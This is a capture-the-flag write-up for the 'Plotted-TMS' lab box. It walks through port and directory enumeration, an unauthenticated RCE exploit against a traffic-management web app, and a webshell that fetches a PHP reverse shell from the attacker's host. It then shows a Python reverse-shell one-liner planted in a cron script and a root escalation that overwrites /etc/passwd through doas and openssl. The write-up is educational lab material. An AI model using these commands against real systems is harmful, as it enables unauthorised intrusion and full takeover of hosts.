CTF : Plotted-TMS
Informations
- IP: 10.10.123.215
- MYIP: 10.9.85.5
First enumeration
Basics
- NMAP
console$ sudo nmap -p- -A 10.10.123.215 Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-26 14:21 CEST Nmap scan report for 10.10.123.215 Host is up (0.052s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 a3:6a:9c:b1:12:60:b2:72:13:09:84:cc:38:73:44:4f (RSA) | 256 b9:3f:84:00:f4:d1:fd:c8:e7:8d:98:03:38:74:a1:4d (ECDSA) |_ 256 d0:86:51:60:69:46:b2:e1:39:43:90:97:a6:af:96:93 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Apache2 Ubuntu Default Page: It works |_http-server-header: Apache/2.4.41 (Ubuntu) 445/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-title: Apache2 Ubuntu Default Page: It works |_http-server-header: Apache/2.4.41 (Ubuntu) Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.5 (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_smb2-time: Protocol negotiation failed (SMB2) TRACEROUTE (using port 5900/tcp) HOP RTT ADDRESS 1 36.98 ms 10.9.0.1 2 38.98 ms 10.10.123.215 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 100.35 seconds
Here the trap was that port 445 is usually used by smb services, but on this box this is a web service.
console$ gobuster dir -f -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.123.215:445 -x cgi,html,txt,js,php,php.bak,bak,zip,sql,sql.bak,tgz,tar.gz,bkp,tar,rar,id_rsa,log,xml,json,sh,py,pl,rb,csv,pub,jar =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.123.215:445 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: html,tar.gz,xml,jar,sh,pl,php,zip,tgz,tar,rar,id_rsa,rb,csv,pub,txt,js,php.bak,sql.bak,bkp,json,cgi,bak,sql,log,py [+] Add Slash: true [+] Follow Redirect: true [+] Timeout: 10s =============================================================== 2022/06/26 14:31:16 Starting gobuster in directory enumeration mode =============================================================== /index.html (Status: 200) [Size: 10918] /icons/ (Status: 403) [Size: 279] /management/ (Status: 200) [Size: 14506]
Under /management I found a site that implements Traffic Offense Management System.
Vulnerabilities search
This site is a traffic management system and it has some vulnerabilities. The one which seems cool is the unauthenticated RCE.
console$ searchsploit traffic offense management system ------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ------------------------------------------------------------------------------------- --------------------------------- Online Traffic Offense Management System 1.0 - 'id' SQL Injection (Authenticated) | php/webapps/50218.txt Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated) | php/webapps/50389.txt Online Traffic Offense Management System 1.0 - Multiple SQL Injection (Unauthenticat | php/webapps/50387.txt Online Traffic Offense Management System 1.0 - Multiple XSS (Unauthenticated) | php/webapps/50388.txt Online Traffic Offense Management System 1.0 - Privilage escalation (Unauthenticated | php/webapps/50392.txt Online Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthen | php/webapps/50221.py Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated | php/webapps/50244.py ------------------------------------------------------------------------------------- ---------------------------------
console$ searchsploit -m php/webapps/50221.py Exploit: Online Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) URL: https://www.exploit-db.com/exploits/50221 Path: /usr/share/exploitdb/exploits/php/webapps/50221.py File Type: Python script, ASCII text executable, with very long lines (823) Copied to: /home/boula/CTF/Plotted-TMS/50221.py
Exploit
And now we just need to launch the script :
console$ python2 50221.py Example: http://example.com Url: http://10.10.123.215:445/management/ Check Url ... [+] Bypass Login [+] Upload Shell [+] Exploit Done!
This scripts exploit the vuln and upload a php file that let us execute commands :
http://10.10.123.215:445/management/uploads/1656247320_evil.php?cmd=ls
So now we prepare a php remote shell script and upload it through the previous script :
console$ curl "http://10.10.123.215:445/management/uploads/1656247320_evil.php?cmd=wget%20http://10.9.85.5:8000/shell.php"
Now, I launch pwncat on port 1234
console$ pwncat -lp 1234 $ curl 'http://10.10.123.215:445/management/uploads/shell.php'
And we got a shell :)
But, we still can't read user.txt found in /home/plot_admin.
Privilege escalation
Enumeration for privesc #1
So ! Let's gather some informations : In /var/www/scripts there is a file called backup.sh :
console$ ls -al total 12 drwxr-xr-x 2 www-data www-data 4096 Oct 28 2021 . drwxr-xr-x 4 root root 4096 Oct 28 2021 .. -rwxrwxr-- 1 plot_admin plot_admin 141 Oct 28 2021 backup.sh
shell$ cat backup.sh #!/bin/bash /usr/bin/rsync -a /var/www/html/management /home/plot_admin/tms_backup /bin/chmod -R 770 /home/plot_admin/tms_backup/management
In /var/www/html/445/management/initialize.php :
php$dev_data = array('id'=>'-1','firstname'=>'Developer','lastname'=>'','username'=>'dev_oretnom','password'=>'5da283a2d990e8d8512cf967df5bc0d0','last_login'=>'','date_updated'=>'','date_added'=>''); if(!defined('base_url')) define('base_url','/management/'); if(!defined('base_app')) define('base_app', str_replace('\\','/',__DIR__).'/' ); if(!defined('dev_data')) define('dev_data',$dev_data); if(!defined('DB_SERVER')) define('DB_SERVER',"localhost"); if(!defined('DB_USERNAME')) define('DB_USERNAME',"tms_user"); if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"Password@123"); if(!defined('DB_NAME')) define('DB_NAME',"tms_db");
With those I connected into mysql and extract this data :
| 1 | Adminstrator | Admin | admin | 14d147dc0ba2fed434e7fd176dc87fdc | uploads/1656247320_evil.php | NULL | 1 | 2021-01-20 14:02:37 | 2022-06-26 12:42:07 |
| 9 | Plotted | User | puser | 1254737c076cf867dc53d60a0364f38e | uploads/1629336240_avatar.jpg | NULL | 2 | 2021-08-19 09:24:25 | 2021-10-28 07:33:02 |And I managed to crack the second hash :
1254737c076cf867dc53d60a0364f38e md5 jsmith123
But this leads to a rabbit hole...
Now, we know that /var/www/scripts is owned by www-data so we can delete the file to replace it by our own evil one :)
Exploit #1
Let's do the trick :
$ mv backup.sh backup.sh.old
$ vi backup.shshell#!/bin/bash /usr/bin/python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.85.5",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Now, we just have to wait for a minute :)
console$ id uid=1001(plot_admin) gid=1001(plot_admin) groups=1001(plot_admin)
Yay ! We can now read usert.txt
consolecat /home/plot_admin/user.txt
First, I add my public key so I can connect throught ssh and have a stable shell.
Enumeration for privesc #2
We don't know plot_admin password, and he can't use sudo commands without it.
So I search files with suid :
console$ find / -perm -4000 -user root 2>/dev/null [...] /usr/bin/doas [...]
doas allow a user to run a command as another one.
So I checked the config file of this tool:
console$ cat /etc/doas.conf permit nopass plot_admin as root cmd openssl
The plot_admin user may use openssl command as root.
Exploit #2
First I generate a password for a future toto user :
console$ openssl passwd -1 -salt toto titu
I add these lines to a file named ~/my_passwd :
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
ubuntu:x:1000:1000:ubuntu:/home/ubuntu:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:113:118:MySQL Server,,,:/nonexistent:/bin/false
plot_admin:x:1001:1001:,,,:/home/plot_admin:/bin/bash
toto:$1$toto$0PDTqFU0JRAGx5zX64tv31:0:0:root:/root:/bin/bashThen, I just have to use doas and openssl to write this data into /etc/passwd :
console$ doas -u root openssl enc -in "my_passwd" -out "/etc/passwd"
Next, we switch user to toto :
console$ su - toto Password: titu root@plotted:~# cat root.txt Congratulations on completing this room! *********** Hope you enjoyed the journey! Do let me know if you have any ideas/suggestions for future rooms. -sa.infinity8888
\o/